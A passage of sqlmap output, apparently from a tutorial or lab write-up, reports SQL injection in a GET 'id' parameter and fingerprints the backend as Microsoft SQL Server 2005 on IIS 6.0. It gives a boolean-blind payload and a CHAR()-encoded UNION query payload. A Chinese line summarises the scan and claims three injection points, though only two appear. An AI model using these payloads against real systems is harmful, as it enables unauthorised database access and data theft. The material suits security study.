sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2 AND 6832=6832
Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-4595 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(100)+CHAR(107)+CHAR(115)+CHAR(73)+CHAR(84)+CHAR(70)+CHAR(114)+CHAR(87)+CHAR(87)+CHAR(75)+CHAR(102)+CHAR(78)+CHAR(117)+CHAR(103)+CHAR(114)+CHAR(116)+CHAR(111)+CHAR(111)+CHAR(118)+CHAR(79)+CHAR(89)+CHAR(118)+CHAR(105)+CHAR(101)+CHAR(76)+CHAR(68)+CHAR(88)+CHAR(111)+CHAR(102)+CHAR(112)+CHAR(120)+CHAR(104)+CHAR(105)+CHAR(82)+CHAR(77)+CHAR(87)+CHAR(84)+CHAR(68)+CHAR(87)+CHAR(66)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL-- - --- [15:24:35] [INFO] testing Microsoft SQL Server [15:24:35] [INFO] confirming Microsoft SQL Server [15:24:35] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 [15:24:35] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 30 times [15:24:35] [INFO] fetched data logged to text files under '/home/ubuntu/.sqlmap/output/219.153.49.228'
这段说明,sqlmap确定了它的后台数据库是Microsoft SQL Server 2005,使用ASP.NET, Microsoft IIS 6.0, ASP进行开发,操作系统是Windows 2003 or XP;而且sqlmap发现了三个注入点。